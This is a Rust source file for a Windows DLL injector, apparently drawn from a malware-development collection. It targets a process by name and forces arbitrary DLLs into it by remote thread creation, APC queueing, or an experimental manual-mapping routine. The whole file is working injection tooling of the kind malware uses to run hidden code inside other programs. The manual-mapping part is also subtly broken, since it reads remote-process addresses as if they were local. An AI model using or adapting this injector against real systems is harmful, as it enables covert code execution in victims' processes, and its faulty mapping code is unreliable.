/*
    DLL Injector [Enhanced Version]
    Author: @5mukx
*/

use std::env::args;
use std::ffi::CString;
use std::fs::File;
use std::io::Read;
use std::ptr::null_mut;
use winapi::ctypes::c_void;
use winapi::shared::basetsd::ULONG_PTR;
use winapi::shared::minwindef::FALSE;
use winapi::shared::ntdef::NULL;
use winapi::shared::winerror::WAIT_TIMEOUT;
use winapi::um::errhandlingapi::GetLastError;
use winapi::um::handleapi::CloseHandle;
use winapi::um::libloaderapi::{GetModuleHandleA, GetProcAddress, LoadLibraryA};
use winapi::um::memoryapi::{ReadProcessMemory, VirtualAllocEx, VirtualFreeEx, WriteProcessMemory};

use winapi::um::processthreadsapi::{
    CreateRemoteThread, GetExitCodeThread, OpenProcess, OpenThread, QueueUserAPC,
    TerminateThread,
};

use winapi::um::synchapi::WaitForSingleObject;

use winapi::um::tlhelp32::{
    CreateToolhelp32Snapshot, Module32First, Module32Next, Process32First, Process32Next,
    Thread32First, Thread32Next, MODULEENTRY32, PROCESSENTRY32, TH32CS_SNAPMODULE,
    TH32CS_SNAPPROCESS, TH32CS_SNAPTHREAD, THREADENTRY32,
};

use winapi::um::winnt::{
    IMAGE_BASE_RELOCATION, IMAGE_DOS_HEADER,
    IMAGE_IMPORT_BY_NAME, IMAGE_IMPORT_DESCRIPTOR, IMAGE_NT_HEADERS64, IMAGE_ORDINAL_FLAG64,
    IMAGE_SECTION_HEADER, MEM_COMMIT, MEM_RELEASE, MEM_RESERVE, PAGE_EXECUTE_READWRITE,
    PAGE_READWRITE, PROCESS_ALL_ACCESS, THREAD_SET_CONTEXT,
};

// Sentinel handle value (all bits set, i.e. -1) that this file compares
// against the result of `CreateToolhelp32Snapshot` to detect failure.
const INVALID_HANDLE_VALUE: *mut c_void = -1isize as *mut c_void;

/// Prints `$msg` to stdout, wrapped in an ANSI colour chosen by `$level`.
///
/// Recognised levels are `"DEBUG"`, `"INFO"`, `"WARN"` and `"ERROR"`; each is
/// printed as `[LEVEL] message`. Any other level prints the bare message using
/// the reset colour. `$msg` may be anything implementing `Display`.
///
/// `$level` is evaluated exactly once.
macro_rules! log {
    ($level:expr, $msg:expr) => {{
        // One table for both the colour and the textual tag, so the two can
        // never drift apart.
        let (color, tag) = match $level {
            "DEBUG" => ("\x1b[94m", "[DEBUG] "), // Blue
            "INFO" => ("\x1b[32m", "[INFO] "),   // Green
            "WARN" => ("\x1b[33m", "[WARN] "),   // Yellow
            "ERROR" => ("\x1b[31m", "[ERROR] "), // Red
            _ => ("\x1b[0m", ""),                // Reset, no tag
        };
        println!("{}{}{}\x1b[0m", color, tag, $msg);
    }};
}

// Source: https://github.com/Whitecat18/Rust-for-Malware-Development/blob/main/Malware_Tips/find_pid_by_name.rs
unsafe fn get_pid(process_name: &str) -> u32 {
    let mut pe: PROCESSENTRY32 = std::mem::zeroed();
    pe.dwSize = std::mem::size_of::<PROCESSENTRY32>() as u32;

    let snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if snap.is_null() {
        log!(
            "ERROR",
            format!(
                "Error while snapshoting processes: Error {}",
                GetLastError()
            )
        );
        std::process::exit(0);
    }

    let mut pid = 0;

    let mut result = Process32First(snap, &mut pe) != 0;

    while result {
        let exe_file = CString::from_vec_unchecked(
            pe.szExeFile
                .iter()
                .map(|&file| file as u8)
                .take_while(|&c| c != 0)
                .collect::<Vec<u8>>(),
        );

        if exe_file.to_str().unwrap() == process_name {
            pid = pe.th32ProcessID;
            break;
        }
        result = Process32Next(snap, &mut pe) != 0;
    }

    if pid == 0 {
        log!(
            "ERROR",
            format!(
                "Unable to get PID for {}: PROCESS DOESNT EXISTS",
                process_name
            )
        );
        std::process::exit(0);
    }

    CloseHandle(snap);
    pid
}

/// Reports whether a module with the same file name as `dll_path` appears in
/// the module snapshot of process `pid`.
///
/// Only the final path component of `dll_path` is compared, and the
/// comparison is done on lowercased names. Returns `false` (after logging an
/// error) when `dll_path` has no file-name component, when the snapshot cannot
/// be created, or when the first module cannot be read.
///
/// # Safety
///
/// Calls raw Win32 Toolhelp APIs and reads the NUL-terminated `szModule`
/// buffer they fill in.
unsafe fn is_module_loaded(pid: u32, dll_path: &str) -> bool {
    // Resolve the name first so a malformed path cannot leak a snapshot
    // handle or panic half-way through the enumeration.
    let dll_name = match std::path::Path::new(dll_path)
        .file_name()
        .and_then(|name| name.to_str())
    {
        Some(name) => name.to_lowercase(),
        None => {
            log!(
                "ERROR",
                format!("Cannot determine a file name from path '{}'", dll_path)
            );
            return false;
        }
    };

    let snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, pid);
    if snapshot == INVALID_HANDLE_VALUE {
        log!("ERROR", "Failed to create module snapshot");
        return false;
    }

    let mut module_entry: MODULEENTRY32 = std::mem::zeroed();
    module_entry.dwSize = std::mem::size_of::<MODULEENTRY32>() as u32;

    if Module32First(snapshot, &mut module_entry) == FALSE {
        CloseHandle(snapshot);
        log!("ERROR", "Failed to get first module");
        return false;
    }

    let mut found = false;
    loop {
        // Module names are ANSI and not guaranteed to be valid UTF-8; a lossy
        // conversion keeps the scan going instead of panicking.
        let module_name = std::ffi::CStr::from_ptr(module_entry.szModule.as_ptr())
            .to_string_lossy()
            .to_lowercase();
        if module_name == dll_name {
            found = true;
            break;
        }
        if Module32Next(snapshot, &mut module_entry) == FALSE {
            break;
        }
    }

    CloseHandle(snapshot);
    found
}

/// Runs the injection method named by `method` for `dll_path` against the
/// process referred to by `process`.
///
/// * `process` - process handle passed through to the Win32 calls below.
/// * `dll_path` - path of the DLL, as given on the command line.
/// * `method` - one of `"CRT"`, `"APC"` or `"TH"`; anything else logs an
///   error and yields `false`.
/// * `pid` - process ID, used for the thread snapshot in the `"APC"` branch
///   and for the module check at the end.
///
/// Returns `false` on any logged failure. For `"CRT"` and `"APC"` the function
/// returns `true` once the branch has run to completion and then logs whether
/// `is_module_loaded` finds the DLL. The `"TH"` branch returns the result of
/// `thread_hijack_inject` directly, so the code after the branch chain is not
/// executed for it.
///
/// # Safety
///
/// Calls raw Win32 APIs with the supplied handle and transmutes a
/// `GetProcAddress` result into a thread/APC routine pointer.
unsafe fn inject_dll(process: *mut c_void, dll_path: &str, method: &str, pid: u32) -> bool {
    // A CString is required for the C-string pointer handed to
    // WriteProcessMemory; conversion fails if the path has an interior NUL.
    let dll_path_cstr = match CString::new(dll_path) {
        Ok(path) => path,
        Err(_) => {
            log!(
                "ERROR",
                format!("Failed to convert DLL path '{}' to CString", dll_path)
            );
            return false;
        }
    };

    // Byte length of the Rust string slice; used as both the allocation size
    // and the number of bytes written.
    let dllsize = dll_path.len();

    let buffer = VirtualAllocEx(
        process,
        null_mut(),
        dllsize,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_READWRITE,
    );
    if buffer.is_null() {
        log!(
            "ERROR",
            format!("Failed to allocate buffer: Error Code {}", GetLastError())
        );
        return false;
    }

    let write_process = WriteProcessMemory(
        process,
        buffer,
        dll_path_cstr.as_ptr() as *const c_void,
        dllsize,
        null_mut(),
    );
    if write_process == 0 {
        log!(
            "ERROR",
            format!(
                "Failed to write DLL path to process memory: Error Code {}",
                GetLastError()
            )
        );
        VirtualFreeEx(process, buffer, 0, MEM_RELEASE);
        return false;
    }

    let kernel32 = GetModuleHandleA("kernel32.dll\0".as_ptr() as *const _);
    if kernel32.is_null() {
        log!(
            "ERROR",
            format!(
                "Failed to get handle to kernel32.dll: Error Code {}",
                GetLastError()
            )
        );
        VirtualFreeEx(process, buffer, 0, MEM_RELEASE);
        return false;
    }

    let load_library_addr = GetProcAddress(kernel32, "LoadLibraryA\0".as_ptr() as *const _);

    if load_library_addr.is_null() {
        log!(
            "ERROR",
            format!(
                "Failed to get address of LoadLibraryA: Error Code {}",
                GetLastError()
            )
        );
        VirtualFreeEx(process, buffer, 0, MEM_RELEASE);
        return false;
    }

    // Method dispatch. Each branch evaluates to the `success` flag, except
    // "TH", which returns from the function directly.
    let success = if method == "CRT" {
        let thread = CreateRemoteThread(
            process,
            null_mut(),
            0,
            Some(std::mem::transmute(load_library_addr)),
            buffer,
            0,
            null_mut(),
        );
        if thread.is_null() {
            log!(
                "ERROR",
                format!(
                    "Failed to create remote thread: Error Code {}",
                    GetLastError()
                )
            );
            VirtualFreeEx(process, buffer, 0, MEM_RELEASE);
            return false;
        }

        // Wait up to 20000 ms for the thread to finish.
        let wait_result = WaitForSingleObject(thread, 20000);
        if wait_result == WAIT_TIMEOUT {
            log!(
                "WARN",
                "Timeout waiting for thread to complete, terminating it"
            );
            TerminateThread(thread, 0);
        }

        // 0x00000103 is the exit code this block treats as "still active".
        let mut exit_code = 0;
        GetExitCodeThread(thread, &mut exit_code);
        if exit_code == 0x00000103 {
            log!("INFO", "Thread still active, terminating it");
            TerminateThread(thread, 0);
        }

        CloseHandle(thread);
        true
    } else if method == "APC" {
        let snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, pid);
        if snapshot == INVALID_HANDLE_VALUE {
            log!("ERROR", "Failed to create thread snapshot for APC");
            VirtualFreeEx(process, buffer, 0, MEM_RELEASE);
            return false;
        }

        let mut thread_entry: THREADENTRY32 = std::mem::zeroed();
        thread_entry.dwSize = std::mem::size_of::<THREADENTRY32>() as u32;

        // Collect the IDs of every snapshot thread owned by `pid`.
        let mut thread_ids: Vec<u32> = Vec::new();

        if Thread32First(snapshot, &mut thread_entry) != 0 {
            loop {
                if thread_entry.th32OwnerProcessID == pid {
                    thread_ids.push(thread_entry.th32ThreadID);
                }
                if Thread32Next(snapshot, &mut thread_entry) == 0 {
                    break;
                }
            }
        }

        CloseHandle(snapshot);

        // Per-thread failures are logged as warnings and do not abort the loop.
        for thread_id in thread_ids {
            let thread_handle = OpenThread(THREAD_SET_CONTEXT, 0, thread_id);
            if thread_handle.is_null() {
                log!(
                    "WARN",
                    format!(
                        "Failed to open thread {}: Error Code {}",
                        thread_id,
                        GetLastError()
                    )
                );
                continue;
            }

            let apc_result = QueueUserAPC(
                Some(std::mem::transmute(load_library_addr)),
                thread_handle,
                buffer as ULONG_PTR,
            );
            if apc_result == 0 {
                log!(
                    "WARN",
                    format!(
                        "Failed to queue APC for thread {}: Error Code {}",
                        thread_id,
                        GetLastError()
                    )
                );
            }
            CloseHandle(thread_handle);
        }

        // Fixed two-second pause before the shared cleanup/verification below.
        std::thread::sleep(std::time::Duration::from_secs(2));
        true
    } else if method == "TH" {
        let thread_inject_success = thread_hijack_inject(process, dll_path, pid);

        if thread_inject_success {
            return true;
        }

        return false;
    } else {
        log!("ERROR", format!("Unknown injection method: {}", method));
        false
    };

    VirtualFreeEx(process, buffer, 0, MEM_RELEASE);

    // Report whether the DLL shows up in the target's module list.
    if success && is_module_loaded(pid, dll_path) {
        log!(
            "INFO",
            format!("DLL '{}' successfully loaded into process", dll_path)
        );
    } else if success {
        log!(
            "WARN",
            format!(
                "DLL '{}' not found in process modules after injection",
                dll_path
            )
        );
    }

    success
}

// Newly added and still experimental: hijack injection (under test).

/// Experimental routine behind the `"TH"` method of `inject_dll`.
///
/// Reads the file at `dll_path`, validates its DOS and NT headers as a
/// 64-bit PE image, allocates `SizeOfImage` bytes via `VirtualAllocEx`, writes
/// the headers and each section with raw data, then processes the relocation
/// and import directories and finally starts a thread at the image's entry
/// point.
///
/// * `process` - process handle passed to the Win32 memory/thread calls.
/// * `dll_path` - path of the DLL file to read.
/// * `_pid` - unused.
///
/// Returns `false` after logging an error on any failure. Returns `true` when
/// the thread was created (after waiting up to 10000 ms for it), or when the
/// image has no entry point.
///
/// # Safety
///
/// Reinterprets file bytes as PE header structures and dereferences raw
/// pointers computed from header fields.
unsafe fn thread_hijack_inject(process: *mut c_void, dll_path: &str, _pid: u32) -> bool {

    // Load the whole DLL file into memory.
    let mut file = match File::open(dll_path) {
        Ok(f) => f,
        Err(_) => {
            log!("ERROR", format!("Failed to open DLL: {}", dll_path));
            return false;
        }
    };
    let mut dll_data = Vec::new();
    if file.read_to_end(&mut dll_data).is_err() {
        log!("ERROR", format!("Failed to read DLL: {}", dll_path));
        return false;
    }

    // Header validation: DOS signature, e_lfanew range, NT signature.
    if dll_data.len() < std::mem::size_of::<IMAGE_DOS_HEADER>() {
        log!("ERROR", "DLL too small for DOS header");
        return false;
    }
    let dos_header = &*(dll_data.as_ptr() as *const IMAGE_DOS_HEADER);
    if dos_header.e_magic != winapi::um::winnt::IMAGE_DOS_SIGNATURE {
        log!("ERROR", "Invalid DOS signature");
        return false;
    }
    if dos_header.e_lfanew as usize >= dll_data.len() {
        log!("ERROR", "Invalid e_lfanew");
        return false;
    }
    let nt_headers = &*((dll_data.as_ptr() as usize + dos_header.e_lfanew as usize)
        as *const IMAGE_NT_HEADERS64);
    if nt_headers.Signature != winapi::um::winnt::IMAGE_NT_SIGNATURE {
        log!("ERROR", "Invalid NT signature");
        return false;
    }

    // Step 3: Allocate memory
    let image_size = nt_headers.OptionalHeader.SizeOfImage as usize;
    let image_base = VirtualAllocEx(
        process,
        null_mut(),
        image_size,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE,
    );
    if image_base.is_null() {
        log!(
            "ERROR",
            format!("Failed to allocate memory: Error {}", GetLastError())
        );
        return false;
    }

    // Copy the PE headers to the start of the allocation.
    let headers_size = nt_headers.OptionalHeader.SizeOfHeaders as usize;

    if headers_size > dll_data.len() {
        log!("ERROR", "Headers size exceeds DLL data");
        VirtualFreeEx(process, image_base, 0, MEM_RELEASE);
        return false;
    }
    if WriteProcessMemory(
        process,
        image_base,
        dll_data.as_ptr() as *const c_void,
        headers_size,
        null_mut(),
    ) == 0
    {
        log!(
            "ERROR",
            format!("Failed to write headers: Error {}", GetLastError())
        );
        VirtualFreeEx(process, image_base, 0, MEM_RELEASE);
        return false;
    }

    // The section table is taken to start immediately after
    // IMAGE_NT_HEADERS64.
    let section_header = (nt_headers as *const _ as usize
        + std::mem::size_of::<IMAGE_NT_HEADERS64>())
        as *const IMAGE_SECTION_HEADER;

    // Copy every section that has raw data, bounds-checking both the source
    // range in the file and the destination range in the image.
    for i in 0..nt_headers.FileHeader.NumberOfSections as isize {
        let section = &*section_header.offset(i);
        if section.SizeOfRawData > 0 {
            if section.PointerToRawData as usize + section.SizeOfRawData as usize > dll_data.len() {
                log!("ERROR", format!("Section {} raw data out of bounds", i));
                VirtualFreeEx(process, image_base, 0, MEM_RELEASE);
                return false;
            }
            let section_dest =
                (image_base as usize + section.VirtualAddress as usize) as *mut c_void;
            if section.VirtualAddress as usize + section.SizeOfRawData as usize > image_size {
                log!("ERROR", format!("Section {} exceeds image size", i));
                VirtualFreeEx(process, image_base, 0, MEM_RELEASE);
                return false;
            }
            let section_src =
                (dll_data.as_ptr() as usize + section.PointerToRawData as usize) as *const c_void;
            if WriteProcessMemory(
                process,
                section_dest,
                section_src,
                section.SizeOfRawData as usize,
                null_mut(),
            ) == 0
            {
                log!(
                    "ERROR",
                    format!("Failed to write section {}: Error {}", i, GetLastError())
                );
                VirtualFreeEx(process, image_base, 0, MEM_RELEASE);
                return false;
            }
        }
    }

    // Difference between the allocated base and the image's preferred base.
    let delta = (image_base as isize - nt_headers.OptionalHeader.ImageBase as isize) as i64;

    // Relocation pass, only when the image was not placed at its preferred
    // base. Data directory index 5 is used as the relocation directory.
    if delta != 0 {
        let reloc_dir = &nt_headers.OptionalHeader.DataDirectory[5];
        if reloc_dir.Size > 0 {
            let mut reloc_base = (image_base as usize + reloc_dir.VirtualAddress as usize)
                as *mut IMAGE_BASE_RELOCATION;
            let mut reloc_offset = 0;
            while reloc_offset < reloc_dir.Size {
                let reloc = &*reloc_base;
                if reloc.VirtualAddress == 0 || reloc.SizeOfBlock == 0 {
                    break;
                }
                // Each block is a header followed by 16-bit entries.
                let num_entries =
                    (reloc.SizeOfBlock - std::mem::size_of::<IMAGE_BASE_RELOCATION>() as u32) / 2;
                let entries = (reloc_base as usize + std::mem::size_of::<IMAGE_BASE_RELOCATION>())
                    as *mut u16;
                for i in 0..num_entries as isize {
                    let entry = *entries.offset(i);
                    // Top 4 bits: relocation type; low 12 bits: offset.
                    let reloc_type = entry >> 12;
                    let offset = (entry & 0xFFF) as u32;
                    if reloc_type == 10 {
                        // IMAGE_REL_BASED_DIR64
                        let reloc_addr = (image_base as usize
                            + reloc.VirtualAddress as usize
                            + offset as usize) as *mut u64;
                        if reloc.VirtualAddress as usize + offset as usize >= image_size {
                            log!("ERROR", "Relocation out of bounds");
                            VirtualFreeEx(process, image_base, 0, MEM_RELEASE);
                            return false;
                        }
                        let value = *reloc_addr; // Read first to ensure memory is accessible
                        *reloc_addr = value + delta as u64;
                    }
                }
                reloc_offset += reloc.SizeOfBlock;
                reloc_base = (reloc_base as usize + reloc.SizeOfBlock as usize)
                    as *mut IMAGE_BASE_RELOCATION;
            }
        }
    }

    // Import pass. Data directory index 1 is used as the import directory;
    // descriptors are walked until one with a zero Name field.
    let import_dir = &nt_headers.OptionalHeader.DataDirectory[1];
    if import_dir.Size > 0 {
        
        let mut import_desc = (image_base as usize + import_dir.VirtualAddress as usize)
            as *mut IMAGE_IMPORT_DESCRIPTOR;
        while (*import_desc).Name != 0 {
            if (*import_desc).Name as usize >= image_size {
                log!("ERROR", "Import descriptor name out of bounds");
                VirtualFreeEx(process, image_base, 0, MEM_RELEASE);
                return false;
            }
            let dll_name_ptr = (image_base as usize + (*import_desc).Name as usize) as *mut c_void;
            let dll_name_size = libc::strlen(dll_name_ptr as *const i8) + 1;
            let mut dll_name_vec = vec![0u8; dll_name_size];

            if ReadProcessMemory(
                process,
                dll_name_ptr,
                dll_name_vec.as_mut_ptr() as *mut c_void,
                dll_name_size,
                null_mut(),
            ) == 0
            {
                log!(
                    "ERROR",
                    format!("Failed to read DLL name: Error {}", GetLastError())
                );
                VirtualFreeEx(process, image_base, 0, MEM_RELEASE);
                return false;
            }
            let dll_name = CString::new(dll_name_vec).unwrap();
            // The imported library is loaded in the calling process to look
            // up function addresses.
            let dll_handle = LoadLibraryA(dll_name.as_ptr());
            if dll_handle.is_null() {
                log!(
                    "ERROR",
                    format!(
                        "Failed to load DLL {:?}: Error {}",
                        dll_name,
                        GetLastError()
                    )
                );
                VirtualFreeEx(process, image_base, 0, MEM_RELEASE);
                return false;
            }
            // `thunk` is the slot that receives the resolved address;
            // `orig_thunk` is the lookup entry, falling back to `thunk` when
            // the descriptor's Characteristics field is zero.
            let mut thunk = (image_base as usize + (*import_desc).FirstThunk as usize) as *mut u64;
            let mut orig_thunk = if *(*import_desc).u.Characteristics() != 0 {
                (image_base as usize + *(*import_desc).u.Characteristics() as usize) as *mut u64
            } else {
                thunk
            };
            while *orig_thunk != 0 {
                // Import by ordinal when the ordinal flag is set, otherwise
                // by name.
                let func_addr = if *orig_thunk & IMAGE_ORDINAL_FLAG64 != 0 {
                    GetProcAddress(dll_handle, (*orig_thunk & 0xFFFF) as *const i8)
                } else {
                    let import_by_name =
                        (image_base as usize + *orig_thunk as usize) as *mut IMAGE_IMPORT_BY_NAME;
                    if (*import_by_name).Name.as_ptr() as usize - image_base as usize >= image_size
                    {
                        log!("ERROR", "Import name out of bounds");
                        VirtualFreeEx(process, image_base, 0, MEM_RELEASE);
                        return false;
                    }
                    let func_name_ptr = (*import_by_name).Name.as_ptr() as *mut c_void;
                    let func_name_size = libc::strlen(func_name_ptr as *const i8) + 1;
                    let mut func_name_vec = vec![0u8; func_name_size];
                    if ReadProcessMemory(
                        process,
                        func_name_ptr,
                        func_name_vec.as_mut_ptr() as *mut c_void,
                        func_name_size,
                        null_mut(),
                    ) == 0
                    {
                        log!(
                            "ERROR",
                            format!("Failed to read function name: Error {}", GetLastError())
                        );
                        VirtualFreeEx(process, image_base, 0, MEM_RELEASE);
                        return false;
                    }
                    let func_name = CString::new(func_name_vec).unwrap();
                    GetProcAddress(dll_handle, func_name.as_ptr())
                };
                if func_addr.is_null() {
                    log!(
                        "ERROR",
                        format!("Failed to resolve import: Error {}", GetLastError())
                    );
                    VirtualFreeEx(process, image_base, 0, MEM_RELEASE);
                    return false;
                }
                if WriteProcessMemory(
                    process,
                    thunk as *mut c_void,
                    &func_addr as *const _ as *const c_void,
                    std::mem::size_of::<u64>(),
                    null_mut(),
                ) == 0
                {
                    log!(
                        "ERROR",
                        format!("Failed to write import thunk: Error {}", GetLastError())
                    );
                    VirtualFreeEx(process, image_base, 0, MEM_RELEASE);
                    return false;
                }
                thunk = thunk.offset(1);
                orig_thunk = orig_thunk.offset(1);
            }
            import_desc = import_desc.offset(1);
        }
    }

    // An image without an entry point is reported as success without starting
    // a thread.
    let entry_point = if nt_headers.OptionalHeader.AddressOfEntryPoint != 0 {
        (image_base as usize + nt_headers.OptionalHeader.AddressOfEntryPoint as usize)
            as *mut c_void
    } else {
        log!("WARN", "No entry point, DLL mapped but not executed");
        return true;
    };
    let thread = CreateRemoteThread(
        process,
        null_mut(),
        0,
        Some(std::mem::transmute(entry_point)),
        image_base as *mut c_void, // hModule for DllMain
        0,
        null_mut(),
    );
    if thread.is_null() {
        log!(
            "ERROR",
            format!("Failed to create remote thread: Error {}", GetLastError())
        );
        VirtualFreeEx(process, image_base, 0, MEM_RELEASE);
        return false;
    }
    // Wait up to 10000 ms; the wait result is not inspected.
    WaitForSingleObject(thread, 10000); 
    CloseHandle(thread);

    log!(
        "INFO",
        format!("DLL '{}' injected at {:p}", dll_path, image_base)
    );
    true
}

fn main() {
    let args: Vec<String> = args().collect();
    if args.len() < 3 {
        log!(
            "ERROR",
            "Usage: dll_inject.exe <Process Name> <DLL Path 1> [DLL Path 2] ... [--method CRT|APC|TH]"
        );
        return;
    }

    let mut method = "CRT";
    let mut dll_paths = Vec::new();
    let mut process_name = "";

    for (i, arg) in args.iter().enumerate() {
        if i == 1 {
            process_name = arg;
        } else if arg == "--method" {
            if i + 1 < args.len() {
                method = &args[i + 1];
                if method != "CRT" && method != "APC" && method != "TH" {
                    log!("ERROR", "Invalid method specified. Use CRT, APC or TH");
                    return;
                }
            } else {
                log!("ERROR", "Missing method argument after --method");
                return;
            }
        } else if i > 1 && !arg.starts_with("--") && (i == 0 || args[i - 1] != "--method") {
            dll_paths.push(arg.clone());
        }
    }

    if dll_paths.is_empty() {
        log!("ERROR", "No DLL paths provided");
        return;
    }

    unsafe {
        let pid = get_pid(process_name);
        log!(
            "INFO",
            format!("Found PID {} for process '{}'", pid, process_name)
        );

        let process = OpenProcess(PROCESS_ALL_ACCESS, 0, pid);
        if process == NULL {
            let error_code = GetLastError();
            match error_code {
                5 => log!("ERROR", "Access denied. Try running as administrator."),
                87 => log!("ERROR", "Invalid PID or process does not exist."),
                _ => log!(
                    "ERROR",
                    format!("Failed to open process: Error Code {}", error_code)
                ),
            }
            return;
        }

        log!(
            "INFO",
            format!("Opened process {} with handle {:?}", pid, process)
        );

        for dll_path in &dll_paths {
            log!("INFO", format!("Attempting to inject DLL: {}", dll_path));
            if inject_dll(process, dll_path, method, pid) {
                log!("INFO", format!("Injection completed for DLL: {}", dll_path));
            } else {
                log!("ERROR", format!("Failed to inject DLL: {}", dll_path));
            }
        }

        CloseHandle(process);
    }
}
